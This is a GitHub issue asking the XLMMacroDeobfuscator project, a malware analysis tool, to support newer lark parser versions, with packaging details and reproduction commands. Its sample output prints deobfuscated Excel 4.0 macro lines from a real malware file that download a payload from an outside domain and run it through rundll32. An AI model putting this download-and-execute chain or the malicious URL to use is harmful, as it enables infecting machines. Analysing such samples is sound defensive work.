search

DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0
568 stars 116 forks source link

Old version/repository of lark used #118

Open xambroz opened 2 months ago

xambroz commented 2 months ago

Hello, please could you consider updating the API of he lark parser to the current API (1.0.0+)? The pypy project lark-parser was renamed to lark while ago and new updates go only to the lark repository.

Versions up to 0.12.0 work (both old lark-parser and new lark repository), but there was significant API change in the 1.0.0 which broke the API a requires a code change in xlmmacrodeobfuscator.

I have tried packaging the XLMMacroDeobfuscator for Fedora, which worked until Fedora 38 when distributiona were still using old version of lark-parser, but it is common now that the linux distributions switched to new API of lark 1.0.0+. Fedora 38 lark-parser - lark-parser 0.12.0 Fedora 39/40 lark - lark 1.1.7 Debian stable Bookworm - lark 1.1.5 Debian unstable Sid - lark 1.1.9 Ubuntu 22+ - lark 1.1.1+

===== This works python 3.12 - lark<1.0.0

virtualenv --python=$(which python3.12) p3.12
p3.12/bin/pip install setuptools
p3.12/bin/pip install xlmmacrodeobfuscator
p3.12/bin/pip uninstall lark-parser -y
p3.12/bin/pip install 'lark<1.0.0'
p3.12/bin/xlmdeobfuscator -f ~/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f | grep -e "CALL"
...
CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
CELL:R16       , FullEvaluation      , IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
CELL:R18       , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)

====== This doesn't work python 3.12 - lark>1.0.0

virtualenv --python=$(which python3.12) p3.12
p3.12/bin/pip install setuptools
p3.12/bin/pip install xlmmacrodeobfuscator
p3.12/bin/pip uninstall lark-parser -y
p3.12/bin/pip install 'lark>1.0.0'
p3.12/bin/xlmdeobfuscator -f ~/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f | grep -e "CALL"

XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)

          _        _______
|\     /|( \      (       )
( \   / )| (      | () () |
 \ (_) / | |      | || || |
  ) _ (  | |      | |(_)| |
 / ( ) \ | |      | |   | |
( /   \ )| (____/\| )   ( |
|/     \|(_______/|/     \|
   ______   _______  _______  ______   _______           _______  _______  _______ _________ _______  _______
  (  __  \ (  ____ \(  ___  )(  ___ \ (  ____ \|\     /|(  ____ \(  ____ \(  ___  )\__   __/(  ___  )(  ____ )
  | (  \  )| (    \/| (   ) || (   ) )| (    \/| )   ( || (    \/| (    \/| (   ) |   ) (   | (   ) || (    )|
  | |   ) || (__    | |   | || (__/ / | (__    | |   | || (_____ | |      | (___) |   | |   | |   | || (____)|
  | |   | ||  __)   | |   | ||  __ (  |  __)   | |   | |(_____  )| |      |  ___  |   | |   | |   | ||     __)
  | |   ) || (      | |   | || (  \ \ | (      | |   | |      ) || |      | (   ) |   | |   | |   | || (\ (
  | (__/  )| (____/\| (___) || )___) )| )      | (___) |/\____) || (____/\| )   ( |   | |   | (___) || ) \ \__
  (______/ (_______/(_______)|/ \___/ |/       (_______)\_______)(_______/|/     \|   )_(   (_______)|/   \__/

....
XLMMacroDeobfuscator(v0.2.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: /home/testuser/tmp/malware/edd554502033d78ac18e4bd917d023da2fd64843c823c1be8bc273f48a5f3f5f

Unencrypted xls file

[Loading Cells]
auto_open: auto_open->'jMAhUST1Sf'!$Q$1
[Starting Deobfuscation]

Error [deobfuscator.py:2598 evaluation_result = self.evaluate_parse_tree(current_cell, parse_tree, interactive)]: 'None'